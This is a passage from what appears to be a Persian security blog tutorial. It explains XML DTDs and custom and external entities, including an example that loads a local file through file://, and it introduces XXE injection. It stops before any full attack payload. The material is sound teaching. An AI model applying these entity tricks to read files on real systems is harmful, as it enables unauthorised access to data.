\u06cc\u0627 \u0628\u0647 \u0627\u0635\u0637\u0644\u0627\u062d \u00ab\u0645\u062a\u0627\u06a9\u0627\u0631\u0627\u06a9\u062a\u0631\u0647\u0627*\u00bb \u0628\u0631\u0627\u06cc \u0628\u0627\u0632 \u0648 \u0628\u0633\u062a\u0647\u200c\u06a9\u0631\u062f\u0646 \u062a\u06af\u200c\u0647\u0627\u06cc XML \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f\u060c \u0648 \u0628\u0647 \u0647\u0645\u06cc\u0646 \u062e\u0627\u0637\u0631 \u0639\u0645\u0648\u0645\u0627 \u0627\u06af\u0631 \u0628\u062e\u0648\u0627\u0647\u06cc\u0645 \u0627\u0632 \u0622\u0646\u200c\u0647\u0627 \u062f\u0631 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062e\u0648\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645\u060c \u0628\u0627\u06cc\u062f \u0627\u0632 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u06af\u0641\u062a\u0647\u200c\u0634\u062f\u0647 \u0631\u0627 \u0628\u0647 \u06a9\u0627\u0631 \u0628\u0628\u0631\u06cc\u0645.\n<strong>* \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u062f\u0631 \u06cc\u06a9 \u0632\u0628\u0627\u0646 \u062e\u0627\u0635 \u0645\u0639\u0646\u06cc \u062e\u0627\u0635\u06cc \u062f\u0627\u0631\u0646\u062f.<\/strong>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-9a13426 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"9a13426\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-98a08eb\" data-id=\"98a08eb\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ac1f4a9 elementor-widget elementor-widget-text-editor\" data-id=\"ac1f4a9\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"dtd\"><span style=\"font-size: 14pt;\">DTD \u06cc\u0627 \u062a\u0639\u0631\u06cc\u0641 \u0646\u0648\u0639 \u0633\u0646\u062f \u0628\u0647 \u0686\u0647 \u0686\u06cc\u0632\u06cc \u06af\u0641\u062a\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f\u061f<\/span><\/h3>\nDTD \u0645\u062e\u0641\u0641 Document Type Definition \u0648 \u0628\u0647 \u0645\u0639\u0646\u0627\u06cc \u00ab\u062a\u0639\u0631\u06cc\u0641 \u0646\u0648\u0639 \u0633\u0646\u062f\u00bb XML \u0627\u0633\u062a \u0648 \u062d\u0627\u0648\u06cc \u062a\u0639\u0627\u0631\u06cc\u0641\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0633\u0627\u062e\u062a\u0627\u0631 \u06cc\u06a9 \u0633\u0646\u062f XML\u060c \u0627\u0646\u0648\u0627\u0639 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u062f\u0631 \u0622\u0646 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u0646\u062f \u0648 \u0645\u0648\u0627\u0631\u062f \u062f\u06cc\u06af\u0631 \u0631\u0627 \u0645\u0634\u062e\u0635 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f. DTD \u062f\u0631 \u062a\u06af \u0627\u062e\u062a\u06cc\u0627\u0631\u06cc DOCTYPE \u062f\u0631 \u0627\u0628\u062a\u062f\u0627\u06cc \u0633\u0646\u062f XML \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a DTD \u0628\u0647 \u0637\u0648\u0631 \u06a9\u0627\u0645\u0644 \u062f\u0627\u062e\u0644 \u062e\u0648\u062f \u0633\u0646\u062f \u0628\u0627\u0634\u062f (Internal DTD)\u060c \u06cc\u0627 \u0627\u0632 \u062c\u0627\u06cc \u062f\u06cc\u06af\u0631\u06cc \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u0634\u0648\u062f (External DTD) \u06cc\u0627 \u062d\u062a\u06cc \u062a\u0631\u06a9\u06cc\u0628\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u062f\u0648 \u062d\u0627\u0644\u062a \u0628\u0627\u0634\u062f.\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-7e5edaf\" data-id=\"7e5edaf\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4639332 elementor-widget elementor-widget-image\" data-id=\"4639332\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"512\" height=\"512\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/dtd-file-format-with-codes.jpg\" class=\"attachment-large size-large wp-image-11106\" alt=\"\u062a\u0639\u0631\u06cc\u0641 \u0646\u0648\u0639 \u0633\u0646\u062f\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/dtd-file-format-with-codes.jpg 512w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/dtd-file-format-with-codes-300x300.jpg 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/dtd-file-format-with-codes-150x150.jpg 150w\" sizes=\"(max-width: 512px) 100vw, 512px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-efccd23 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"efccd23\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3fd0bc5\" data-id=\"3fd0bc5\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ea27cc7 elementor-widget elementor-widget-text-editor\" data-id=\"ea27cc7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h3 id=\"custom-entity\"><span style=\"font-size: 12pt;\"><strong>\u0627\u0646\u062a\u06cc\u062a\u06cc \u0634\u062e\u0635\u06cc\u200c\u0633\u0627\u0632\u06cc \u0634\u062f\u0647 (Custom Entity) \u0686\u06cc\u0633\u062a \u0648 \u0686\u06af\u0648\u0646\u0647 \u062a\u0639\u0631\u06cc\u0641 \u0645\u06cc\u200c\u0634\u0648\u062f\u061f<\/strong>\u00a0<\/span><\/h3>\n\u0632\u0628\u0627\u0646 XML \u0628\u0647 \u0634\u0645\u0627 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u062f\u0627\u062e\u0644 DTD\u060c \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u062c\u062f\u06cc\u062f \u0648 \u0634\u062e\u0635\u06cc\u200c\u0633\u0627\u0632\u06cc\u200c\u0634\u062f\u0647 \u062a\u0639\u0631\u06cc\u0641 \u06a9\u0646\u06cc\u062f. \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e5d3c29 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e5d3c29\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-d84350c\" data-id=\"d84350c\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5f25bcc elementor-widget elementor-widget-text-editor\" data-id=\"5f25bcc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong><code class=\"language-unknown\"><\/code><\/strong><\/span><\/p><p style=\"text-align: left;\"><span style=\"color: #ffffff;\"><strong>&lt;!DOCTYPE foo [ &lt;!ENTITY myentity &#8220;my entity value&#8221; &gt; ]&gt; &gt;<\/strong><\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-374f994 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"374f994\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-fc183ff\" data-id=\"fc183ff\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f8c56c6 elementor-widget elementor-widget-text-editor\" data-id=\"f8c56c6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\u062a\u0639\u0631\u06cc\u0641 \u0628\u0627\u0644\u0627 \u06cc\u0639\u0646\u06cc \u0647\u0631\u062c\u0627\u06cc\u06cc \u062f\u0631 \u0627\u06cc\u0646 \u0633\u0646\u062f XML \u0628\u0647 &amp;myentity \u0627\u0631\u062c\u0627\u0639 \u062f\u0647\u06cc\u0645\u060c \u0628\u0627 \u0645\u0642\u062f\u0627\u0631 \u062a\u0639\u0631\u06cc\u0641\u200c\u0634\u062f\u0647\u200c\u06cc \u00ab my entity value \u00bb (\u06a9\u0647 \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0648\u0631\u062f \u06cc\u06a9 \u0627\u0633\u062a\u0631\u06cc\u0646\u06af \u0627\u0633\u062a) \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0645\u06cc\u200c\u0634\u0648\u062f.\n\n\u0628\u0647 \u0637\u0648\u0631 \u062e\u06cc\u0644\u06cc \u0633\u0627\u062f\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u06af\u0641\u062a \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627 \u062f\u0631 XML\u060c \u00ab\u0634\u0628\u06cc\u0647 \u0628\u0647\u00bb \u0645\u062a\u063a\u06cc\u0631\u0647\u0627 \u062f\u0631 \u0632\u0628\u0627\u0646\u200c\u0647\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0646\u0648\u06cc\u0633\u06cc \u062f\u06cc\u06af\u0631 \u0647\u0633\u062a\u0646\u062f\u060c \u0648 \u0645\u0642\u0627\u062f\u06cc\u0631 \u0645\u062e\u062a\u0644\u0641 \u0631\u0627 \u062f\u0631 \u062e\u0648\u062f \u0646\u06af\u0647 \u0645\u06cc\u200c\u062f\u0627\u0631\u0646\u062f\u060c \u06af\u0631\u0686\u0647 \u0646\u0628\u0627\u06cc\u062f \u0622\u0646\u200c\u0647\u0627 \u0631\u0627 \u0628\u0627 \u0645\u062a\u063a\u06cc\u0631 \u0627\u0634\u062a\u0628\u0627\u0647 \u06af\u0631\u0641\u062a.\n<h3 id=\"ext-entity\"><span style=\"font-size: 12pt;\">External Entity \u06cc\u0627 \u0627\u0646\u062a\u06cc\u062a\u06cc \u062e\u0627\u0631\u062c\u06cc \u0686\u06cc\u0633\u062a\u061f<\/span><\/h3>\n\u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc \u06cc\u0627 External Entities \u062f\u0631 \u0632\u0628\u0627\u0646 XML \u0646\u0648\u0639\u06cc \u0627\u0632 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u0634\u062e\u0635\u06cc\u200c\u0633\u0627\u0632\u06cc\u200c\u0634\u062f\u0647 \u0647\u0633\u062a\u0646\u062f \u06a9\u0647 \u062e\u0627\u0631\u062c \u0627\u0632 DTD \u062a\u0639\u0631\u06cc\u0641 \u0634\u062f\u0647\u200c\u0627\u0646\u062f.\u0628\u0631\u0627\u06cc \u062a\u0639\u0631\u06cc\u0641 \u06cc\u06a9 External Entity \u0628\u0627\u06cc\u062f \u0627\u0632 \u06a9\u0644\u06cc\u062f\u0648\u0627\u0698\u0647 SYSTEM \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f \u0648 \u0647\u0645\u06cc\u0646\u200c\u0637\u0648\u0631 \u0628\u0627\u06cc\u062f \u06cc\u06a9 \u0644\u06cc\u0646\u06a9 \u0631\u0627 \u0645\u0634\u062e\u0635 \u06a9\u0631\u062f \u06a9\u0647 \u0645\u0642\u062f\u0627\u0631 \u0627\u0646\u062a\u06cc\u062a\u06cc \u0627\u0632 \u0622\u0646 \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u0634\u0648\u062f. \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644:\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ad7ef7c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ad7ef7c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-937a4e1\" data-id=\"937a4e1\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a695a73 elementor-widget elementor-widget-text-editor\" data-id=\"a695a73\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\"><code class=\"language-unknown\"><\/code><\/span><\/strong><\/p><p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">&lt;!DOCTYPE foo [ &lt;!ENTITY ext SYSTEM &#8220;http:\/\/normal-website.com&#8221; &gt; ]&gt;<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ab6a7e4 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ab6a7e4\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-e62b9cb\" data-id=\"e62b9cb\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-29cd7cc elementor-widget elementor-widget-text-editor\" data-id=\"29cd7cc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>\u0627\u06cc\u0646 \u06cc\u0639\u0646\u06cc \u0647\u0631\u062c\u0627 \u06a9\u0647 \u062f\u0631 \u062f\u0627\u062f\u0647\u200c\u0647\u0627\u06cc \u062f\u0627\u062e\u0644 \u0633\u0646\u062f \u0628\u0647 &amp;ext \u0627\u0631\u062c\u0627\u0639 \u062f\u0647\u06cc\u0645\u060c \u06cc\u06a9 \u0631\u06cc\u06a9\u0648\u0626\u0633\u062a \u0628\u0647 \u0648\u0628\u0633\u0627\u06cc\u062a normal-website.com \u0627\u0631\u0633\u0627\u0644 \u062e\u0648\u0627\u0647\u062f \u0634\u062f \u0648 \u0645\u0642\u062f\u0627\u0631 \u062e\u0648\u0627\u0646\u062f\u0647\u200c\u0634\u062f\u0647 \u0627\u0632 \u0627\u06cc\u0646 \u0622\u062f\u0631\u0633 \u062a\u062c\u0632\u06cc\u0647 (\u06cc\u0627 \u0627\u0635\u0637\u0644\u0627\u062d\u0627 Parse) \u0645\u06cc\u200c\u0634\u0648\u062f \u0648 \u0628\u0647 \u062c\u0627\u06cc &amp;ext \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f. \u0639\u0644\u0627\u0648\u0647 \u0628\u0631 \u0627\u06cc\u0646\u060c \u062f\u0631 \u0627\u06cc\u0646 \u0644\u06cc\u0646\u06a9 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u067e\u0631\u0648\u062a\u06a9\u0644 file:\/\/ \u0647\u0645 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647\u060c \u0648 \u0627\u06cc\u0646 \u06af\u0648\u0646\u0647 External Entity \u0631\u0627 \u0628\u0647 \u0635\u0648\u0631\u062a \u0645\u062d\u0644\u06cc \u0648 \u0627\u0632 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 \u0628\u0627\u0631\u06af\u06cc\u0631\u06cc \u06a9\u0631\u062f. \u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-dad9480 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"dad9480\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-52f8d40\" data-id=\"52f8d40\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8197e81 elementor-widget elementor-widget-text-editor\" data-id=\"8197e81\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\"><code class=\"language-unknown\"><\/code><\/span><\/strong><\/p><p dir=\"ltr\" style=\"text-align: left;\"><strong><span style=\"color: #ffffff;\">&lt;!DOCTYPE foo [ &lt;!ENTITY ext SYSTEM &#8220;file:\/\/\/path\/to\/file&#8221; &gt; ]&gt;<\/span><\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-a4779af elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"a4779af\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-600c8a0\" data-id=\"600c8a0\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-3a38d3f elementor-widget elementor-widget-text-editor\" data-id=\"3a38d3f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>(\u062f\u0642\u062a \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u062f\u0631 \u0645\u062b\u0627\u0644 \u0628\u0627\u0644\u0627\u060c \u062f\u0648 \u0627\u0633\u0644\u0634 \u0628\u0631\u0627\u06cc \u067e\u0631\u0648\u062a\u06a9\u0644 file:\/\/ \u0648 \u06cc\u06a9 \u0627\u0633\u0644\u0634 \u0628\u0631\u0627\u06cc \u0622\u062f\u0631\u0633 \u06af\u0630\u0627\u0634\u062a\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a)<br \/>\u0627\u06cc\u0646 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc \u0647\u0633\u062a\u0646\u062f \u06a9\u0647 \u0632\u0645\u06cc\u0646\u0647\u200c\u06cc \u0628\u0647 \u0648\u062c\u0648\u062f \u0622\u0645\u062f\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE Injection \u0631\u0627 \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-a115664 elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"a115664\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-57ec9cb\" data-id=\"57ec9cb\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5d72bd7 elementor-widget elementor-widget-text-editor\" data-id=\"5d72bd7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2 id=\"ext-entity-injection\"><span style=\"font-size: 12pt;\">XXE Injection \u06cc\u0627 \u062a\u0632\u0631\u06cc\u0642 \u0627\u0646\u062a\u06cc\u062a\u06cc\u200c\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc\u00a0<\/span><\/h2>\n\u062f\u0631 \u0627\u062f\u0627\u0645\u0647 \u0627\u0628\u062a\u062f\u0627 \u0628\u0627 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc XXE \u0648 \u0645\u0646\u0634\u0623 \u0628\u0647\u200c\u0648\u062c\u0648\u062f\u0622\u0645\u062f\u0646 \u0622\u0646\u200c\u0647\u0627 \u0622\u0634\u0646\u0627 \u0645\u06cc\u200c\u0634\u0648\u06cc\u0645\u060c \u0648 \u0633\u067e\u0633 \u0628\u0627 \u0645\u062b\u0627\u0644\u200c\u0647\u0627\u06cc \u0639\u0645\u0644\u06cc\u060c \u0627\u0646\u0648\u0627\u0639 \u0631\u0648\u0634\u200c\u0647\u0627\u06cc \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627 \u0648 \u0627\u0646\u062c\u0627\u0645 \u062d\u0645\u0644\u0627\u062a XXE \u0645\u062e\u062a\u0644\u0641 \u0631\u0627 \u0645\u06cc\u200c\u0622\u0645\u0648\u0632\u06cc\u0645.\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-b735ce8\" data-id=\"b735ce8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d161727 elementor-widget elementor-widget-image\" data-id=\"d161727\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/injection-copy-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail wp-image-11107\" alt=\"\u062a\u0632\u0631\u06cc\u0642 xxe\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/injection-copy-150x150.jpg 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/injection-copy-300x300.jpg 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2021\/05\/injection-copy.jpg 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cfa135c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cfa135c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3d0e7b1\" data-id=\"3d0e7b1\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0804d9f elementor-widget elementor-widget-heading\" data-id=\"0804d9f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<span class=\"elementor-heading-title elementor-size-medium\">\u0628\u0627 \u062f\u06cc\u06af\u0631 \u062d\u0645\u0644\u0627\u062a Injection \u0622\u0634\u0646\u0627 \u0634\u0648\u06cc\u062f:<\/span>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-bad1fbb elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"bad1fbb\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-eb6cc10\" data-id=\"eb6cc10\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-461ab62 elementor-button-info elementor-align-center elementor-widget elementor-widget-button\" data-id=\"461ab62\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm elementor-animation-grow\" href=\"\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">SQL Injection 